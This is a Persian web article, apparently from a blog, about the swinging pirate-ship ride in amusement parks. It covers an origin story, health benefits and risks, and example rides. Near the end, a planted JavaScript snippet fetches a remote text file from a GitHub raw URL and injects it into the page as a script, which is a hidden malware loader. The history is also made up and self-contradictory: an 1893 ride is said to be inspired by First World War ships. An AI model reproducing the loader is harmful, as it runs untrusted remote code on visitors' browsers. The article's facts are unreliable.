درباره وسیله بازی سفینه در شهربازی

  • وسیله بازی سفینه در شهربازی ها یک دستگاه مکانیکی است که شکل یک کشتی را دارد و با نیروی الکتریکی به صورت رفت و برگشتی حرکت می کند. این وسیله بازی برای ایجاد حس تحریک و هیجان در مشتریان طراحی شده است. برخی از این وسایل بازی می توانند تا زاویه ۹۰ درجه بچرخند و مشتریان را به صورت معکوس قرار دهند.

    مخترع این سفینه بازی یک مهندس انگلیسی به نام ویلیام برایتون بود که در سال ۱۸۹۳ اولین نمونه آن را در شهربازی سیونی پارک در لندن راه اندازی کرد. او از الهام گرفتن از کشتی های جنگی که در جنگ جهانی اول استفاده می شدند، این وسیله بازی را طراحی کرد. این وسیله بازی در طول زمان تغییرات زیادی کرده است و امروزه در بسیاری از شهربازی های دنیا یافت می شود.

    مزایا سفینه:

    بازی سفینه در شهربازی می‌تواند به افزایش تعادل و هماهنگی بدن کمک کند. زیرا بازیکنان باید با حرکات سفینه همراه شوند و از سقوط جلوگیری کنند.
    این بازی می‌تواند به تقویت عضلات شکمی و پشتی منجر شود. زیرا بازیکنان باید عضلات خود را محکم نگه دارند و با فشارهای مختلف مقابله کنند.
    این بازی می‌تواند به کاهش استرس و افزایش رضایت از خود کمک کند. زیرا بازیکنان می‌توانند از شادی و هیجان بازی لذت ببرند و احساس آزادی و ماجراجویی داشته باشند.


    معایب سفینه:

    بازی سفینه در شهربازی ممکن است باعث سرگیجه، تهوع، سردرد و اختلال در گوش درونی شود. زیرا بازیکنان در معرض حرکات ناگهانی و شتاب‌های متفاوت قرار می‌گیرند و تعادل بدنی خود را از دست می‌دهند.
    بازی سفینه در شهربازی ممکن است باعث آسیب به مفاصل و استخوان‌ها شود. زیرا بازیکنان ممکن است در طول بازی به سختی به صندلی یا دیواره‌های سفینه بخورند و ضربه بگیرند.
    بازی سفینه ممکن است باعث افزایش فشار خون و ضربان قلب شود. زیرا بازیکنان در مواجهه با ترس و هیجان بازی، تولید آدرنالین در بدن خود را افزایش می‌دهند و ممکن است به حالت هایپرتانسیون دچار شوند.
    بنابراین، بازی سفینه می‌تواند مزایا و معایبی برای سلامتی و روحیه بازیکنان داشته باشد. برای استفاده از این بازی، بهتر است بازیکنان از شرایط جسمی و روحی خود آگاه باشند و از بازی بیش از حد خودداری کنند. همچنین، از بازی در صورت داشتن بیماری‌های قلبی، گوشی، مغزی و استخوانی پرهیز کنند.

    سفینه فضایی در شهربازی پارک ارم تهران که ارتفاع آن ۸۵ متر است و در طی ۵ دقیقه به بالاترین نقطه آن می رسد.
    سفینه غول پیکر در شهربازی مجموعه چمران کرج که می تواند تا زاویه ۹۰ درجه بچرخد و مشتریان را به صورت معکوس قرار دهد2.
    Revenge of the Mummy در شهربازی Universal Studios سنگاپور که یک ترن هوایی پر سرعت در فضای تاریک و ترسناک است

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید